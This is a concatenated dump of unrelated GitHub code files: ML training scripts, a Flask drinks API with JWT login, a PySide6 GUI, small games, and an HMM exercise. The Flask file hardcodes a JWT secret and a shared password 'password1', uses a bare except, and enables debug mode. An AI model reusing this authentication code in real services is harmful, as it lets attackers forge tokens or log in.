'vocab/fineTune_Rev_itos.pkl', bs = 8)\n\n #print(data_lmRev.show_batch())\n\n fine_tune(work_dir=Data_path, data_loader_folder='DataLoader', dataLoader_name='data_lm_fineTune_Rev.pkl', arch=AWD_LSTM,\n custom_config=True, pretrained=True,\n pretrained_fnames=[Data_path / 'DataLoader/models/domainSpecific_Yelp_model', Data_path / 'vocab/domainSpecific_Yelp_itos'],\n drop_mult=0.5, opt_func='Adam', loss_func=None, metrics=[accuracy], true_wd=True, bn_wd=True, wd=0.01,\n train_bn=True, lr=3e-4, model_save_path='DataLoader/models/modelRevFine',\n vocab_save_path='vocab/itosRevFine.pkl', encoding_save_path='encoding/encoderRevFine',\n DataLoaderLM_save_path='DataLoader/data_lmYelpFine.pkl',\n DataLoaderCl_save_path='DataLoader/data_clYelpFine.pkl', cuda_id=0, vocab_weight_balance=vocab_update)\n\n\nif args.classifier:\n data_path = DATA_DIR / 'phase1/bml'\n\n df_trnRev, df_valRev = load_data_training(data_path=data_path, n_labels=10, n_textfield=1)\n\n dataRev_clas = get_Clas_DataLoader(path=data_path, data_trn=df_trnRev, data_val=df_valRev, n_labels=10,\n max_vocab=70000,\n min_freq=1,\n use_pretrain_vocab=True,\n pretrain_path=Data_path / 'DataLoader',\n DataLoader_name='data_lm_fineTune_Rev.pkl', Save_Path = Data_path, DataLoader_save_path = 'DataLoader/data_cl_fineTune_Rev.pkl', bs=8)\n\n train_clas(work_dir=Data_path, data_loader_folder='DataLoader', dataLoader_name='data_cl_fineTune_Rev.pkl', n_labels=10,\n arch=AWD_LSTM, custom_config=True, pretrained=True,\n pretrained_fnames=[Data_path / 
'encoding/encoderRevFine', Data_path / 'vocab/fineTune_Rev_itos'],\n drop_mult=0.5, opt_func='Adam', loss_func=None, metrics=[accuracy], true_wd=True, bn_wd=True, wd=0.01,\n train_bn=True, lr=1e-2, model_save_path='DataLoader/models/modelClassRev', encoding_save_path='encoding/encoderClasRev',\n cuda_id=0, use_discriminative=True, chain_thaw=True)\n\n\n\n\n\n\n\n","repo_name":"chetan-punchh/AWD","sub_path":"scripts/main_script.py","file_name":"main_script.py","file_ext":"py","file_size_in_byte":9059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41570648654","text":"\"\"\" Unchanneled Path Length (structured).\n\nCompute the unchanneled path length (UPL), i.e., the shortest distance to a\n channel node (rectangular \"raster\" grids).\n\nAuthor: Olivier Gourgue (University of Antwerp & Boston University).\n\n\"\"\"\n\nimport numpy as np\nfrom scipy import spatial\n\n\n################################################################################\n# Unchanneled path length. #####################################################\n################################################################################\n\ndef upl(x, y, chn, mask = None):\n \"\"\"Compute the unchanneled path length (UPL).\n\n Args:\n x, y (NumPy arrays): Grid cell coordinates (1D).\n chn (NumPy array, boolean): True for channel nodes, False otherwise\n (first dimension for x, second dimension for y), for one (2D array)\n or several time steps (3D array, second dimension for time).\n mask (NumPy array, boolean): True at grid cells where UPL is not\n computed (same shape as chn for one time step; default to None, that\n is, no mask).\n\n Returns:\n NumPy array: Unchanneled path length (same shape as chn).\n \"\"\"\n\n # Number of grid cells.\n nx = chn.shape[0]\n ny = chn.shape[1]\n\n # Reshape chn as a 3D array, if needed.\n if chn.ndim == 2:\n chn = chn.reshape((nx, ny, 1))\n\n # Initialize.\n upl = np.zeros(chn.shape)\n\n # Number of time steps.\n nt = chn.shape[2]\n\n # Default mask.\n if mask is None:\n mask = np.zeros((nx, ny), dtype = bool)\n\n # Area of interest.\n not_mask = np.logical_not(mask)\n\n # Mesh grid.\n xx, yy = np.meshgrid(x, y, indexing = 'ij')\n\n # Loop over time steps.\n for i in range(nt):\n\n # Reshape into 1D arrays.\n chn_flat = chn[:, :, i].reshape(-1)\n not_mask_flat = not_mask.reshape(-1)\n xx_flat = xx.reshape(-1)\n yy_flat = yy.reshape(-1)\n upl_flat = upl[:, :, i].reshape(-1)\n\n # Channel node indices and coordinates.\n ind_chn = np.flatnonzero(chn_flat * not_mask_flat)\n xy_chn = np.array([xx_flat[ind_chn], yy_flat[ind_chn]]).T\n\n # Platform node indices and coordinates.\n ind_plt = np.flatnonzero(np.logical_not(chn_flat) * not_mask_flat)\n xy_plt = np.array([xx_flat[ind_plt], yy_flat[ind_plt]]).T\n\n # UPL.\n if len(ind_chn) > 0:\n tree = spatial.KDTree(xy_chn)\n upl_plt, ind = tree.query(xy_plt)\n upl_flat[ind_plt] = upl_plt\n\n upl[:, :, i] = upl_flat.reshape((nx, ny))\n\n # Reshape as a 2D array, if needed.\n if nt == 1:\n upl = upl.reshape((nx, ny))\n\n return upl","repo_name":"ogourgue/tidalgeopro","sub_path":"upl_structured.py","file_name":"upl_structured.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"30098890909","text":"#$env:FLASK_APP = \"main\" --> ${API}:FLASK_APP = \"main\" \r\n#API/Scripts/activate.bat\r\n#from application import db\r\n#flask run\r\n\r\nfrom flask import Flask\r\nfrom 
flask_sqlalchemy import SQLAlchemy\r\nfrom flask import request\r\n\r\nfrom flask import jsonify\r\nfrom flask import make_response\r\n\r\nimport jwt\r\nimport datetime\r\n\r\nfrom functools import wraps\r\n\r\n\r\napp = Flask(__name__)\r\n\r\n\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///data.db'\r\napp.config['SECRET_KEY'] = 'mysecretkey'\r\ndb = SQLAlchemy(app)\r\n\r\n\r\n\r\n\r\nclass Drink(db.Model):\r\n    id = db.Column(db.Integer, primary_key=True)\r\n    name = db.Column(db.String(80), unique=True, nullable=False)\r\n    description = db.Column(db.String(120))\r\n\r\n    def __repr__(self):\r\n        return f\"{self.name} - {self.description}\"\r\n\r\n@app.route('/')\r\ndef index():\r\n    return 'Hello!'\r\n\r\n@app.route('/drinks')\r\ndef get_drinks():\r\n    drinks = Drink.query.all()\r\n\r\n    output = []\r\n    for drink in drinks:\r\n        drink_data = {'name':drink.name, 'description': drink.description}\r\n        output.append(drink_data)\r\n    return {\"drinks\": output}\r\n\r\n@app.route('/drinks/<int:id>')\r\ndef get_drink(id):\r\n    drink = Drink.query.get_or_404(id)\r\n    return {\"name\":drink.name, \"description\":drink.description}\r\n\r\n\r\n@app.route('/drinks', methods=['POST'])\r\ndef add_drink():\r\n    drink = Drink(name=request.json[\"name\"], description=request.json[\"description\"])\r\n    db.session.add(drink)\r\n    db.session.commit()\r\n    return {'id':drink.id}\r\n\r\n@app.route('/drinks/<int:id>', methods=['DELETE'])\r\ndef delete_drink(id):\r\n    drink = Drink.query.get(id)\r\n    if drink is None:\r\n        return {\"error\":\"not found\"}\r\n    db.session.delete(drink)\r\n    db.session.commit()\r\n    return {\"message\":\"Deleted\"}\r\n\r\n\r\n@app.route('/login')\r\ndef login():\r\n    auth = request.authorization\r\n\r\n    if auth and auth.password == 'password1':\r\n        token = jwt.encode({'user' : auth.username, 'exp' : datetime.datetime.utcnow() + datetime.timedelta(minutes=5)}, app.config['SECRET_KEY'])\r\n        return jsonify({'token' : token})\r\n\r\n    return make_response('Could not verify!', 401, {'WWW-Authenticate' : 'Basic realm=\"Login Required\"'})\r\n\r\ndef token_required(f):\r\n    @wraps(f)\r\n    def decorated(*args, **kwargs):\r\n        token = request.args.get('token')\r\n        if not token:\r\n            return {'message' : 'Token is missing'}, 403\r\n\r\n        try:\r\n            data = jwt.decode(token, app.config['SECRET_KEY'], algorithms=['HS256'])\r\n            \r\n        except:\r\n            return {'message' : 'Token is invalid'}, 403\r\n\r\n        return f(*args, **kwargs)\r\n    return decorated\r\n    \r\n@app.route('/unprotected')\r\ndef unprotected():\r\n    return {'message' : 'Anyone can see this.'}\r\n\r\n\r\n\r\n@app.route('/protected')\r\n\r\n@token_required\r\ndef protected():\r\n    return {'message' : 'Available with valid tokens.'}\r\n\r\n\r\nif __name__ == '__main__':\r\n    app.run(debug=True)","repo_name":"Brooona/RestAPI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1048069080","text":"import logging\n\nimport PySide6.QtWidgets\n\nfrom PySide6.QtWidgets import QRadioButton, QCheckBox, QListWidget, QSizePolicy,QComboBox\nfrom matplotlib.backends.backend_qt import NavigationToolbar2QT as NavigationToolbar\nfrom matplotlib.backends.backend_qtagg import FigureCanvasQTAgg\nfrom matplotlib.figure import Figure\n\nfrom common.common import LimitType, UniteType, Types, index_of\nfrom common.simpleexceptioncontext import simple_exception_handling\nfrom config import config\nfrom gui.forminitializerinterface import FormInitializerInterface\nfrom 
gui.formobserver import FormObserver\nfrom gui.formobserverinterface import ResetRanges\nfrom gui.listobserver import additems\n\n\nclass FormInitializer(FormObserver, FormInitializerInterface):\n\n @property\n def window(self):\n return self.wind\n\n @window.setter\n def window(self, value):\n self.wind = value\n\n\n\n def __init__(self):\n super().__init__()\n\n @property\n def figure(self):\n return self._canvas.figure\n\n @property\n def axes(self):\n return self._canvas.ax\n\n def prepare_graph_widget(self):\n #tabWidget = self.window.tabWidget_8Page1 # type: QTabWidget\n\n self._canvas = MplCanvas()\n #sc.manager.window.move(1,1)\n toolbar = NavigationToolbar(self._canvas, self.window)\n #layout = QVBoxLayout()\n self.window.graph_groupbox.layout().addWidget(toolbar)\n self.window.graph_groupbox.layout().addWidget(self._canvas)\n\n\n def after_load(self):\n self.rad_types = self.window.findChildren(QRadioButton) + self.window.findChildren(QCheckBox,\n name=\"unite_ADDPROT\") + self.window.findChildren(\n QCheckBox, name=\"unite_ADDTOTAL\") + self.window.findChildren(QCheckBox, name=\"COMPARE\")\n self.prepare_graph_widget()\n self.window.filterrangesection.setTitle(\"Filter Range\")\n self.window.filterrangesection.setContentLayout(self.window.formLayout)\n\n\n\n\n def set_all_toggled_value(self):\n type= self.graphObj.params.type\n unite = self.graphObj.params.unite_by_group\n limit_by= self.graphObj.params.limit_by\n for rad in self.rad_types:\n name=rad.objectName()\n #func= rad.setChecked if type(rad)==QCheckBox else rad.setCheckState\n #x : QCheckBox\n if name.startswith('limit'):\n name = name[len('limit') + 1:]\n rad.setChecked(bool(limit_by & getattr(LimitType,name)))\n elif name.startswith('unite'):\n name = name[len('unite') + 1:]\n rad.setChecked( bool(unite & getattr(UniteType,name)))\n else:\n try:\n rad.setChecked(bool(type & getattr(Types, name)))\n except:\n pass\n\n def setup_controls_from_params(self,initial=True,isinitialforstock=None):\n self.ignore_cat_changes = False\n self.ignore_updates_for_now=True\n self.set_all_toggled_value()\n self.set_groups_values(isinitialforstock=initial if isinitialforstock==None else isinitialforstock)\n\n self.window.daterangepicker.update_prop()\n self.window.startdate.setDateTime(self.graphObj.mindate)\n self.window.enddate.setDateTime(self.graphObj.maxdate)\n self.window.daterangepicker.start=self.graphObj.mindate\n self.window.daterangepicker.end = self.graphObj.maxdate\n self.window.daterangepicker.update_obj()\n if not initial:\n self.window.daterangepicker.datevalue= (self.graphObj.params.fromdate,self.graphObj.params.todate)\n else:\n self.window.daterangepicker.dateValueChanged.connect(self.date_changed)\n self.window.use_groups.setChecked(self.graphObj.params.use_groups)\n self.window.findChild(QCheckBox, name=\"usereferncestock\").setChecked(self.graphObj.params.use_ext)\n self.window.findChild(QCheckBox, name=\"limit_to_port\").setChecked(self.graphObj.params.limit_to_portfolio)\n if self.graphObj.params.adjust_to_currency:\n self.window.findChild(QCheckBox, name=\"adjust_currency\").setCheckState(PySide6.QtCore.Qt.CheckState.Checked)\n elif self.graphObj.params.adjusted_for_base_cur:\n self.window.findChild(QCheckBox, name=\"adjust_currency\").setCheckState(PySide6.QtCore.Qt.CheckState.PartiallyChecked)\n else:\n self.window.findChild(QCheckBox, name=\"adjust_currency\").setCheckState(PySide6.QtCore.Qt.CheckState.Unchecked)\n\n\n self.window.home_currency_combo.clear()\n 
self.window.home_currency_combo.addItems(list(config.Symbols.DefaultCurr), )\n\n\n if not initial and self.graphObj.params.compare_with:\n wc = self.window.comparebox\n\n l=[wc.itemText(x) for x in range(wc.count())]\n ind=index_of(self.graphObj.params.compare_with,l)\n self.window.comparebox.setCurrentIndex(ind)\n if ind==-1:\n self.window.comparebox.setCurrentText(self.graphObj.params.compare_with)\n self.window.findChild(QCheckBox, name=\"COMPARE\").setChecked(self.graphObj.params.type & Types.COMPARE)\n if initial:\n self.load_existing_graphs()\n self.ignore_updates_for_now = False\n\n def set_groups_values(self, isinit=1,isinitialforstock=1):\n b=False\n wc: QComboBox= self.window.categoryCombo\n self.ignore_cat_changes = True\n if self.graphObj.Categories!=[wc.itemText(x) for x in range(wc.count())]:\n b=True\n\n wc.clear()\n wc.addItems(self.graphObj.Categories) #sorry\n\n if isinitialforstock and self.graphObj.params.cur_category:\n wc.setCurrentIndex(index_of( self.graphObj.params.cur_category ,self.graphObj.Categories) )\n self.ignore_cat_changes = False\n\n options = list(self.graphObj.Groups.keys())\n value = self.graphObj.params.groups if self.graphObj.params.groups != None else list()\n wc= self.window.groups\n if options != [wc.item(x).text() for x in range(wc.count())]:\n b=True\n wc.clear()\n wc.addItems(options) # sorry\n if not b and not isinit:\n return\n #self.window.groups.addItems(options)\n self.window.groups.setSelectionMode(PySide6.QtWidgets.QAbstractItemView.SelectionMode.MultiSelection)\n # self.groups_changed()\n self.update_stock_list(isinitialforstock and isinit)\n self.update_ranges(isinit+1) #if intial then force\n if isinit:\n self.select_rows(self.window.groups, [options.index(v) for v in value])\n\n def update_rangeb(self,minmax):\n self.disable_slider_values_updates=True\n if minmax[0]==minmax[1]:\n minmax = (minmax[0],minmax[0]+0.1)\n self.window.min_crit.setRange(minmax[0], minmax[1])\n self.window.min_crit.setValue(minmax)\n self.disable_slider_values_updates = False\n\n def update_range_num(self,nuofoptions):\n if nuofoptions==0:\n nuofoptions=1\n self.disable_slider_values_updates=True\n self.window.max_num.setRange(0, nuofoptions)\n self.window.max_num.setValue((0, nuofoptions))\n self.disable_slider_values_updates = False\n\n def update_ranges(self,reset_type=ResetRanges.IfAPROP):\n nuofoptions = len(self.graphObj.colswithoutext)\n\n self.disable_slider_values_updates=True #convert to ..\n if nuofoptions==0:\n nuofoptions =1\n self.window.max_num.setRange(0, nuofoptions)\n\n if self.graphObj.minValue is None or self.graphObj.maxValue is None:\n self.disable_slider_values_updates = False\n return\n if self.graphObj.minValue==self.graphObj.maxValue and self.graphObj.maxValue==0:\n logging.debug(('bad range'))\n self.window.min_crit.setRange(self.graphObj.minValue, self.graphObj.maxValue+0.1)\n else:\n self.window.min_crit.setRange(self.graphObj.minValue, self.graphObj.maxValue)\n\n if reset_type==ResetRanges.FORCE:\n self.window.max_num.setValue((0, nuofoptions))\n self.window.min_crit.setValue((self.graphObj.minValue, self.graphObj.maxValue))\n self.disable_slider_values_updates = False\n\n @simple_exception_handling(err_description=\"Error in adding items\")\n def update_stock_list(self,isinitial=0,justorgs=False):\n org: QListWidget = self.window.orgstocks # type:\n \n if self.window.unite_NONE.isChecked() or not self.graphObj.params.use_groups:\n if self.graphObj.params.use_groups:\n org.clear()\n 
additems(org,self.graphObj.get_options_from_groups(self.graphObj.params.groups))\n elif isinitial:\n org.clear()\n additems(org,self.graphObj.params.selected_stocks)\n \n if justorgs:\n return\n \n\n alloptions= sorted(list(self.graphObj.usable_symbols)) #CompareEngine.get_options_from_groups([g for g in CompareEngine.Groups])\n \n #self._last_choice= self.window.comparebox.currentText()\n if isinitial:\n for comp in [self.window.comparebox,self.window.addstock] :\n comp.clear()\n comp.addItems(alloptions)\n \n \n \n \n \n #additems(org,self.graphObj.cols)\n refs: QListWidget = self.window.refstocks # type:\n refs.clear()\n additems(refs, self.graphObj.params.ext)\n\n\n\nclass MplCanvas(FigureCanvasQTAgg):\n def __init__(self):\n self.fig = Figure()\n self.ax = self.fig.add_subplot(111)\n FigureCanvasQTAgg.__init__(self, self.fig)\n FigureCanvasQTAgg.setSizePolicy(self, QSizePolicy.Expanding, QSizePolicy.Expanding)\n FigureCanvasQTAgg.updateGeometry(self)\n","repo_name":"eyalk11/compare-my-stocks","sub_path":"src/compare_my_stocks/gui/forminitializer.py","file_name":"forminitializer.py","file_ext":"py","file_size_in_byte":9971,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"35556166535","text":"import numpy as np\n\n# Implemting eq 15.12\ndef forward(T, O, msg):\n return normalize(O*T.T*msg)\n\n# Implemting eq 15.13\ndef backward(T, O, msg):\n return T*O*msg\n\n\ndef filtering(T, O_model, init_message, observations):\n # Initilize the fv_msg array with the init_message\n fv_messages = [ init_message ]\n\n # For every observation, calculate the next msg\n for e in observations:\n msg = forward(T, O_model[e], fv_messages[-1])\n fv_messages.append(msg)\n\n return fv_messages\n\n\ndef smoothing(T, O_model, init_message, observations):\n # Initilize the fv_msg array with the init_message\n fv_messages = [init_message]\n\n # For every observation, calculate the next msg\n for e in observations:\n msg = forward(T, O_model[e], fv_messages[-1])\n fv_messages.append(msg)\n\n # Initilize the b_msg array with 1's and the same shape as init_message\n b_msg = [ np.ones_like(init_message) ]*( len(observations)+1 )\n # Initiate the sv array\n sv = [None]*len(observations)\n\n # For every observation, calculate the smoothing estimate and next b_msg\n for i in range(len( observations )-1, -1, -1):\n sv[i] = normalize(np.multiply(fv_messages[i+1], b_msg[i+1]))\n b_msg[i] = backward(T, O_model[observations[i]], b_msg[i+1])\n return sv, b_msg\n\n\n# Normalize the probabilities\ndef normalize(probs):\n total = probs.sum()\n alpha = 1/total\n return alpha*probs\n\n\nif __name__ == '__main__':\n # Dynamic/transition model\n T = np.matrix('0.7 0.3; 0.3 0.7')\n\n # Observation/sensor model\n O = [np.matrix('0.1 0; 0 0.8'), # P(Umberella = False)\n np.matrix('0.9 0; 0 0.2')] # P(Umberella = True)\n\n # Problems, where 1 means the umberella is shown and 0 that it is not\n prob_1 = [1, 1]\n prob_2 = [1, 1, 0, 1, 1]\n\n # Printing\n print(\"Filtering prob 1\")\n print(filtering(T, O, np.matrix('0.5; 0.5'), prob_1))\n print(\"Filtering prob 2\")\n print(filtering(T, O, np.matrix('0.5; 0.5'), prob_2))\n print(\"Smoothing prob 1\")\n print(\"sv: \", smoothing(T, O, np.matrix('0.5; 0.5'), prob_1)[0])\n print(\"b_msg: \", smoothing(T, O, np.matrix('0.5; 0.5'), prob_1)[1])\n print(\"Smoothing prob 1\")\n print(\"sv: \", smoothing(T, O, np.matrix('0.5; 0.5'), prob_2)[0])\n print(\"b_msg: \", smoothing(T, O, np.matrix('0.5; 0.5'), 
prob_2)[1])\n","repo_name":"kattn/ai_methods","sub_path":"ass2/markov_process.py","file_name":"markov_process.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29309252169","text":"import random\nnumero_aleatorio=random.randint(1,20)\nnumero_ingresado=int(input(\"Enter your number:\"))\nadivinaste=True\nintentos=5\nwhile adivinaste and intentos>=1:\n    if numero_ingresado==numero_aleatorio:\n        adivinaste=False\n        print(\"You guessed it, my number was\",numero_aleatorio)\n    else:\n        # count the wrong guess first, and only re-prompt while attempts remain,\n        # so the last guess asked for is always checked by the loop\n        intentos=intentos-1\n        if intentos>=1:\n            numero_ingresado=int(input(\"Try another:\"))\nif intentos<1:\n    print(\"You didn't guess it, my number was\",numero_aleatorio)\n    \n\n\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej12/hito1_ej12_39603897150cf254dc8143a2096e9352.py","file_name":"hito1_ej12_39603897150cf254dc8143a2096e9352.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37597010308","text":"#Minimum cost to reach destination from train in directed acyclic graph\n\nINF = 2147483647\nn = 4 \n\ndef minCost(cost):\n    dist = [INF]*n\n    dist[0] = 0\n    \n    for i in range(n):\n        for j in range(i+1,n):\n            if dist[j] > dist[i] + cost[i][j]:\n                dist[j] = dist[i] + cost[i][j]\n    \n    return dist[n-1]\n    \ncost= [ [0, 15, 80, 90],\n        [INF, 0, 40, 50],\n        [INF, INF, 0, 70],\n        [INF, INF, INF, 0]]\n    \nprint(minCost(cost))\n","repo_name":"Geeky-star/Graphstudy","sub_path":"minimum cost to reach destination.py","file_name":"minimum cost to reach destination.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1022592019","text":"#! 
/usr/bin/env python3\n\nimport numpy as np\nimport sys\n\nif __name__ == \"__main__\":\n\tif len(sys.argv) < 3:\n\t\tprint(\"expected at least 2 arguments [src1] [src2] ...\")\n\t\texit(1)\n\tresults = []\n\tfor file in sys.argv[1:]:\n\t\tans = np.load(file)\n\t\tresults.append(ans)\n\tdiffs = 0\n\tfor (i, lb) in enumerate(results[0]):\n\t\tnotice = False\n\t\tanss = [lb]\n\t\tfor dif in results[1:]:\n\t\t\tmyans = dif[i]\n\t\t\tif myans != lb:\n\t\t\t\tnotice = True\n\t\t\tanss.append(myans)\n\t\tif notice:\n\t\t\tdiffs += 1\n\t\t\tprint(\"No: {} predicts: {}\".format(i, anss))\n\tprint(\"Total diffs: {} out of {} ({:.2f}%)\".format(diffs, len(results[0]), diffs*100/len(results[0])))\n\n","repo_name":"George0828Zhang/Sound-Class","sub_path":"comp.py","file_name":"comp.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40827433929","text":"from PIL import Image\nimport os\n\n# path to directory containing tif images\ntif_dir = '/data_1/train/gt'\n\n# create directory for saving png images\nif not os.path.exists('/data_1/train/Label_ori'):\n os.makedirs('/data_1/train/Label_ori')\n\n# loop through all tif images in directory and convert to png\nfor file_name in os.listdir(tif_dir):\n if file_name.endswith('.tif'):\n # open tif image\n with Image.open(os.path.join(tif_dir, file_name)) as im:\n # convert to binary image\n binary_im = im.convert('1')\n # save as png image\n png_file_name = file_name[:-4] + '_mask.png'\n png_path = os.path.join('/data_1/train/Label_ori', png_file_name)\n binary_im.save(png_path)\n","repo_name":"giganticpower/WCTNet","sub_path":"data_1/label_transfor.py","file_name":"label_transfor.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"21218703255","text":"from datetime import datetime\nfrom fastapi import Request\n\n\nasync def audit_log_transaction(request: Request, call_next):\n action = f\"{request.method} {request.url.path}\"\n timestamp = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n client_ip = request.client.host\n query_params = dict(request.query_params)\n path_params = dict(request.path_params)\n\n log_message = f\"\"\"{timestamp} - Action: {action}, IP: {client_ip}\n Query Parameters: {query_params}\n Path Parameters: {path_params}\n \"\"\"\n\n with open(\"audit_log_transaction.log\", \"a\", encoding=\"utf-8\") as log_file:\n log_file.write(log_message + \"\\n\")\n\n response = await call_next(request)\n return response\n","repo_name":"leonardolima-escolar/crud-fastapi-2","sub_path":"app/middlewares/audit_log_transaction.py","file_name":"audit_log_transaction.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41591157210","text":"import re, random, math\n\nart = [\n \" __________\",\n \" |/ |\",\n \" O |\",\n \" /|\\ |\",\n \" | |\",\n \" / \\ |\",\n \"__________/|\",\n \"| | | | | \\|\"\n]\n\nwords = open(\"./words.txt\").read().split(\"\\n\")\n\nscore = 0\n\nguessed = []\n\nclass scoreboard:\n wins = 0\n losses = 0\n\ntotalScore = scoreboard()\n\ncont = True\n\nendChallenge = False\n\nguess = \"\"\n\nword = \"\"\n\nspacer = \"\\n\\n\\n\"\n\ndef printHangman(s):\n if s > 0:\n for line in art[0:s]:\n print(line)\n print(\"\")\n\nwhile cont:\n word = words[math.floor(random.random() * len(words))]\n guessed = [\"_\"] * len(word)\n score = 0\n 
endChallenge = False\n while not endChallenge:\n print(spacer)\n print(\"Hangman! Guess the word by inputting guesses as to what letters it contains.\\n\")\n printHangman(score)\n for c in guessed:\n print(c, end = \" \")\n print(\"\\n\")\n guess = \"\"\n while len(guess) != 1 or re.search(\"[^a-zA-Z]\", guess):\n guess = input(\"Input a one-letter guess: \")\n if guess in word and guess not in guessed:\n for i in range(len(word)):\n if word[i] == guess:\n guessed[i] = guess\n if \"_\" not in guessed:\n print(f\"\\nYou did it!\\nThe word is {word}, and you didn't get hanged!\")\n totalScore.wins += 1\n endChallenge = True\n else:\n if score < len(art) - 1:\n if guess not in guessed:\n print(\"\\nGood try! But wrong, unfortunately. Try again!\")\n else:\n print(\"\\nYou already guessed that! I have to take points away for that.\")\n score += 1\n else:\n print(\"\\nYou lose! You ran out of guesses. I can't show you the word, that would be cheating.\")\n printHangman(score + 1)\n totalScore.losses += 1\n endChallenge = True\n print(spacer)\n print(f\"Current score:\\n Games won: {totalScore.wins}\\n Games lost: {totalScore.losses}\"\n + f\"\\n Percent of games won: {(totalScore.wins / (totalScore.wins + totalScore.losses)) * 100}%\")\n print(spacer)\n cont = (input(\"Type \\\"y\\\" to keep playing or anything else to exit: \") == \"y\")","repo_name":"Matthew-MT/AdvPy-mmontoni-till","sub_path":"hangman/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17543210996","text":"'''\nECE276A WI19 HW1\nBlue Barrel Detector\n'''\n\nimport os, cv2\nfrom skimage.measure import label, regionprops\nimport numpy as np\n\nclass BarrelDetector():\n\tdef __init__(self):\n\t\tself.barrel_blue_mean = np.load('trained_parameters/barrel_blue_mean.npy')\n\t\tself.barrel_blue_cov = np.load('trained_parameters/barrel_blue_cov.npy')\n\t\tself.black_mean = np.load('trained_parameters/black_mean.npy')\n\t\tself.black_cov = np.load('trained_parameters/black_cov.npy')\n\t\tself.green_mean = np.load('trained_parameters/green_mean.npy')\n\t\tself.green_cov = np.load('trained_parameters/green_cov.npy')\n\t\tself.red_mean = np.load('trained_parameters/red_mean.npy')\n\t\tself.red_cov = np.load('trained_parameters/red_cov.npy')\n\t\tself.white_mean = np.load('trained_parameters/white_mean.npy')\n\t\tself.white_cov = np.load('trained_parameters/white_cov.npy')\n\t\tself.yellow_mean = np.load('trained_parameters/yellow_mean.npy')\n\t\tself.yellow_cov = np.load('trained_parameters/yellow_cov.npy')\n\t\tself.target_blue_mean = np.load('trained_parameters/target_blue_mean.npy')\n\t\tself.target_blue_cov = np.load('trained_parameters/target_blue_cov.npy')\n\t\tself.not_target_blue_mean = np.load('trained_parameters/not_target_blue_mean.npy')\n\t\tself.not_target_blue_cov = np.load('trained_parameters/not_target_blue_cov.npy')\n\t\tself.kettle_blue_mean = np.load('trained_parameters/kettle_blue_mean.npy')\n\t\tself.kettle_blue_cov = np.load('trained_parameters/kettle_blue_cov.npy')\n\t\tself.stick_blue_mean = np.load('trained_parameters/stick_blue_mean.npy')\n\t\tself.stick_blue_cov = np.load('trained_parameters/stick_blue_cov.npy')\n\t\tself.wall_blue_mean = np.load('trained_parameters/wall_blue_mean.npy')\n\t\tself.wall_blue_cov = np.load('trained_parameters/wall_blue_cov.npy')\n\t\tself.carpet_blue_mean = np.load('trained_parameters/carpet_blue_mean.npy')\n\t\tself.carpet_blue_cov = 
np.load('trained_parameters/carpet_blue_cov.npy')\n\n\tdef segment_image(self, img):\n\t\t#current_image = np.zeros((800,1200,3))\n\t\tcurrent_image = np.asarray(img)\n\t\t#current_image = np.asarray(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))[:,:,0:2]\n\t\tcurrent_image = np.reshape(current_image,(960000,3))\n\t\tmask_img = np.zeros((800,1200))\n\t\tscores = np.zeros((800,1200,6))\n\t\tbarrel_blue_score = np.log(abs(np.linalg.det(self.barrel_blue_cov))) + np.reshape(np.sum(np.multiply(np.transpose(np.dot(current_image-self.barrel_blue_mean.transpose(),np.linalg.inv(self.barrel_blue_cov))),current_image.transpose()-self.barrel_blue_mean),axis=0),(800,1200))\n\t\tblack_score = np.log(abs(np.linalg.det(self.black_cov))) + np.reshape(np.sum(np.multiply(np.transpose(np.dot(current_image-self.black_mean.transpose(),np.linalg.inv(self.black_cov))),current_image.transpose()-self.black_mean),axis=0),(800,1200))\n\t\tgreen_score = np.log(abs(np.linalg.det(self.green_cov))) + np.reshape(np.sum(np.multiply(np.transpose(np.dot(current_image-self.green_mean.transpose(),np.linalg.inv(self.green_cov))),current_image.transpose()-self.green_mean),axis=0),(800,1200))\n\t\tred_score = np.log(abs(np.linalg.det(self.red_cov))) + np.reshape(np.sum(np.multiply(np.transpose(np.dot(current_image-self.red_mean.transpose(),np.linalg.inv(self.red_cov))),current_image.transpose()-self.red_mean),axis=0),(800,1200))\n\t\twhite_score = np.log(abs(np.linalg.det(self.white_cov))) + np.reshape(np.sum(np.multiply(np.transpose(np.dot(current_image-self.white_mean.transpose(),np.linalg.inv(self.white_cov))),current_image.transpose()-self.white_mean),axis=0),(800,1200))\n\t\tyellow_score = np.log(abs(np.linalg.det(self.yellow_cov))) + np.reshape(np.sum(np.multiply(np.transpose(np.dot(current_image-self.yellow_mean.transpose(),np.linalg.inv(self.yellow_cov))),current_image.transpose()-self.yellow_mean),axis=0),(800,1200))\n\t\tscores[:,:,0] = barrel_blue_score\n\t\tscores[:,:,1] = black_score\n\t\tscores[:,:,2] = green_score\n\t\tscores[:,:,3] = red_score\n\t\tscores[:,:,4] = white_score\n\t\tscores[:,:,5] = yellow_score\n\t\tscores_m = 